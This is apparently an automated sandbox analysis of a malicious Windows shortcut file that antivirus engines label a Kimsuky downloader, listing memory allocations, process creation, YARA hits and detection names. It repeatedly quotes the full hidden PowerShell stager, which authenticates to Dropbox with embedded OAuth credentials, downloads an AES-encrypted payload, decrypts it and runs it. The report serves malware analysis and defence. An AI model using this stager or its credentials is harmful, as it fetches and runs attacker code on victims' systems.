NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02777000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02775000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02763000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02766000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02768000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02769000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a37000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a39000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a3d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a3e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a3f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 1, 2024, 10:10 a.m.	process_identifier: 292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\886535bbe925890a01f49f49f49fee40.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $len1 = 1055494;$len2 = 1097478;$len3 = 1097478;$len4 = 0x0010BF1A; $clientID = \"n4cbu7oqmhjc8g4\";$clientSecret = \"tljfr15auwthgfs\";$refreshToken = \"DHn1AW_R0rYAAAAAAAAAAYZ_QnHNwRsFir9l7mXFbtO1Ktifhc4MK9XaB4ChtiDL\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step4/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

cmdline

powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $len1 = 1055494;$len2 = 1097478;$len3 = 1097478;$len4 = 0x0010BF1A; $clientID = \"n4cbu7oqmhjc8g4\";$clientSecret = \"tljfr15auwthgfs\";$refreshToken = \"DHn1AW_R0rYAAAAAAAAAAYZ_QnHNwRsFir9l7mXFbtO1Ktifhc4MK9XaB4ChtiDL\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step4/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 1, 2024, 10:10 a.m.	thread_identifier: 2184 thread_handle: 0x00000330 process_identifier: 2188 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $len1 = 1055494;$len2 = 1097478;$len3 = 1097478;$len4 = 0x0010BF1A; $clientID = \"n4cbu7oqmhjc8g4\";$clientSecret = \"tljfr15auwthgfs\";$refreshToken = \"DHn1AW_R0rYAAAAAAAAAAYZ_QnHNwRsFir9l7mXFbtO1Ktifhc4MK9XaB4ChtiDL\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step4/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1	0
CreateProcessInternalW Aug. 1, 2024, 10:10 a.m.	thread_identifier: 2340 thread_handle: 0x00000084 process_identifier: 292 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $len1 = 1055494;$len2 = 1097478;$len3 = 1097478;$len4 = 0x0010BF1A; $clientID = \"n4cbu7oqmhjc8g4\";$clientSecret = \"tljfr15auwthgfs\";$refreshToken = \"DHn1AW_R0rYAAAAAAAAAAYZ_QnHNwRsFir9l7mXFbtO1Ktifhc4MK9XaB4ChtiDL\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step4/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 1, 2024, 10:10 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (2 events)

Data sent	yufªà}{ÊÛ Çi;uÕÈhI,sMÌµÿÍ/5 ÀÀÀ À 284ÿcontent.dropboxapi.com
Data sent	yufªàþI¡d¤RZ[ib¬ÌÂ9=Ø¥ç&SrØ-/5 ÀÀÀ À 284ÿcontent.dropboxapi.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 1, 2024, 10:10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Aug. 1, 2024, 10:10 a.m.	buffer: yufªà}{ÊÛ Çi;uÕÈhI,sMÌµÿÍ/5 ÀÀÀ À 284ÿcontent.dropboxapi.com socket: 1420 sent: 126	1	126	0
send Aug. 1, 2024, 10:10 a.m.	buffer: yufªàþI¡d¤RZ[ib¬ÌÂ9=Ø¥ç&SrØ-/5 ÀÀÀ À 284ÿcontent.dropboxapi.com socket: 1420 sent: 126	1	126	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3020 resumed a thread in remote process 2188
NtResumeThread Aug. 1, 2024, 10:10 a.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 2188	1	0	0

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Skyhigh	BehavesLike.Dropper.tx
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Heur.BZC.YAX.Boxter.812.EAA66D53
Arcabit	Heur.BZC.YAX.Boxter.812.E9AA812D
Symantec	Scr.Mallnk!gen13
ESET-NOD32	LNK/Kimsuky.H
Avast	LNK:Agent-IL [Trj]
Kaspersky	HEUR:Trojan.Multi.Powecod.i
BitDefender	Heur.BZC.YAX.Boxter.812.EAA66D53
MicroWorld-eScan	Heur.BZC.YAX.Boxter.812.EAA66D53
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft	Trojan.PowerShell.Gen (A)
DrWeb	LNK.Downloader.469
FireEye	Heur.BZC.YAX.Boxter.812.EAA66D53
Sophos	Troj/LnkObf-T
Google	Detected
MAX	malware (ai score=81)
Kingsoft	Script.Troj.CMDLnk.22143
ViRobot	LNK.S.Downloader.1097498
ZoneAlarm	HEUR:Trojan.Multi.Powecod.i
GData	Heur.BZC.YAX.Boxter.812.EAA66D53
Varist	PSH/Boxter.A
AhnLab-V3	Downloader/LNK.Powershell.S2543
VBA32	Trojan.Link.Crafted
huorong	TrojanDownloader/LNK.Agent.co
Fortinet	LNK/Kimsuky.GOSU!tr
AVG	LNK:Agent-IL [Trj]

886535bbe925890a01f49f49f49fee40.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All